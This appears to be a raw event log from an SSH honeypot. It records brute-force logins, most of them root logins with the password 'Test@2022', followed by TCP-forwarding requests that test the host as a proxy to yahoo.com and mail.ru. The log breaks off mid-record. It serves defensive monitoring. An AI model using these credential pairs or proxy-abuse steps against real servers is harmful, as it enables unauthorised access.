{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.306997Z","src_ip":"77.83.207.83","session":"175aec167ba9"}
{"eventid":"cowrie.login.failed","username":"master","password":"12345","message":"login attempt [master/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.321439Z","src_ip":"212.227.125.160","session":"f826dbb809ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":21398,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21398","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.448699Z","session":"175aec167ba9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.499028Z","src_ip":"77.83.207.83","session":"175aec167ba9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.550159Z","src_ip":"77.83.207.83","session":"175aec167ba9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7731,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e8c13dccaaf","protocol":"ssh","message":"New connection: 77.83.207.83:7731 (1.2.3.4:22) [session: 0e8c13dccaaf]","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.599184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.609016Z","src_ip":"77.83.207.83","session":"0e8c13dccaaf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.649426Z","src_ip":"77.83.207.83","session":"0e8c13dccaaf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.898655Z","src_ip":"77.83.207.83","session":"0e8c13dccaaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20057,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:20057","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.950241Z","session":"0e8c13dccaaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.000229Z","src_ip":"77.83.207.83","session":"0e8c13dccaaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21440,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21440","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.140383Z","session":"0e8c13dccaaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.190370Z","src_ip":"77.83.207.83","session":"0e8c13dccaaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":18852,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18852","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.332111Z","session":"0e8c13dccaaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.382004Z","src_ip":"77.83.207.83","session":"0e8c13dccaaf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.432527Z","src_ip":"77.83.207.83","session":"0e8c13dccaaf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7809,"dst_ip":"1.2.3.4","dst_port":22,"session":"81e570c4c396","protocol":"ssh","message":"New connection: 77.83.207.83:7809 (1.2.3.4:22) [session: 81e570c4c396]","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.481713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.482567Z","src_ip":"77.83.207.83","session":"81e570c4c396"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.532253Z","src_ip":"77.83.207.83","session":"81e570c4c396"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.779946Z","src_ip":"77.83.207.83","session":"81e570c4c396"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.781359Z","src_ip":"212.227.125.160","session":"f826dbb809ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11932,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11932","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.830590Z","session":"81e570c4c396"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:11.880550Z","src_ip":"77.83.207.83","session":"81e570c4c396"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":20374,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20374","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.020173Z","session":"81e570c4c396"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.070736Z","src_ip":"77.83.207.83","session":"81e570c4c396"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":10011,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10011","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.212069Z","session":"81e570c4c396"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.262051Z","src_ip":"77.83.207.83","session":"81e570c4c396"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.312559Z","src_ip":"77.83.207.83","session":"81e570c4c396"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7899,"dst_ip":"1.2.3.4","dst_port":22,"session":"cac77fa708ef","protocol":"ssh","message":"New connection: 77.83.207.83:7899 (1.2.3.4:22) [session: cac77fa708ef]","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.361135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.362001Z","src_ip":"77.83.207.83","session":"cac77fa708ef"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.411684Z","src_ip":"77.83.207.83","session":"cac77fa708ef"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.658990Z","src_ip":"77.83.207.83","session":"cac77fa708ef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7120,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7120","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.709722Z","session":"cac77fa708ef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.759764Z","src_ip":"77.83.207.83","session":"cac77fa708ef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":16375,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:16375","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.899945Z","session":"cac77fa708ef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:12.949545Z","src_ip":"77.83.207.83","session":"cac77fa708ef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":507,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:507","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.091970Z","session":"cac77fa708ef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.141828Z","src_ip":"77.83.207.83","session":"cac77fa708ef"}
{"eventid":"cowrie.session.closed","duration":"79.0","message":"Connection lost after 79.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.189434Z","src_ip":"212.227.235.229","session":"bd5f49b6856c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.192397Z","src_ip":"77.83.207.83","session":"cac77fa708ef"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7995,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f97e2e35f33","protocol":"ssh","message":"New connection: 77.83.207.83:7995 (1.2.3.4:22) [session: 3f97e2e35f33]","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.241530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.242308Z","src_ip":"77.83.207.83","session":"3f97e2e35f33"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.292443Z","src_ip":"77.83.207.83","session":"3f97e2e35f33"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.541005Z","src_ip":"77.83.207.83","session":"3f97e2e35f33"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32327,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32327","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.591662Z","session":"3f97e2e35f33"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.641577Z","src_ip":"77.83.207.83","session":"3f97e2e35f33"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":25855,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25855","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.784260Z","session":"3f97e2e35f33"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.834207Z","src_ip":"77.83.207.83","session":"3f97e2e35f33"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":14929,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14929","sensor":"my-vps","timestamp":"2025-08-31T03:49:13.976290Z","session":"3f97e2e35f33"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":48952,"dst_ip":"1.2.3.4","dst_port":22,"session":"130d7f797131","protocol":"ssh","message":"New connection: 34.14.223.46:48952 (1.2.3.4:22) [session: 130d7f797131]","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.009292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.015198Z","src_ip":"34.14.223.46","session":"130d7f797131"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.026151Z","src_ip":"77.83.207.83","session":"3f97e2e35f33"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.076988Z","src_ip":"77.83.207.83","session":"3f97e2e35f33"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8087,"dst_ip":"1.2.3.4","dst_port":22,"session":"33d1edee3fb3","protocol":"ssh","message":"New connection: 77.83.207.83:8087 (1.2.3.4:22) [session: 33d1edee3fb3]","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.125599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.126188Z","src_ip":"77.83.207.83","session":"33d1edee3fb3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2